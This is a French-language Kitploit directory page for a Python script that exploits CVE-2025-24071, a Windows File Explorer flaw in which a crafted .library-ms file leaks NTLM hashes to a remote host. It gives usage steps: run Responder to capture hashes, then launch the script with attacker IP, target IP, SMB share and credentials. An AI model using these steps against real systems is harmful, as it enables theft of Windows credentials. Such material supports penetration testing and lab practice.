Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24071 — Script Python pour exécuter CVE-2025-24071 | Kitploit
Outils/GitHubGitHub/ac8999/cve-2025-24071
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Script Python pour exécuter CVE-2025-24071

Voir le dépôt
14il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24071 : Vulnérabilité d'usurpation de l'Explorateur de fichiers de Microsoft Windows (script par SilentExploit)

📖 Description

Ce projet détecte et démontre l'exploitation d'une vulnérabilité d'usurpation de l'Explorateur de fichiers Windows.

Le problème provient d'un fichier de bibliothèque Windows (.library-ms) contenant un chemin réseau, soit en pièce jointe directe, soit intégré dans une archive.
Lorsqu'il est ouvert, le fichier peut entraîner une fuite de hachages NTLM vers un emplacement réseau distant (potentiellement malveillant).

POC: https://imgur.com/a/hEO83Se

⚡ Utilisation

1. Démarrer Responder

Sur votre machine d'attaque, exécutez Responder pour capturer les hachages NTLM :

root@kitploit:~
sudo responder -I tun0 -wvF
  1. Exécuter le script

Vous pouvez configurer le script de deux manières :

✅ Option A : Modifier les valeurs par défaut (le plus simple)

Modifiez les paramètres par défaut directement dans le script.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ Option B : Exécuter avec les paramètres en ligne de commande

Exécutez avec des arguments :

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
Télécharger l’outil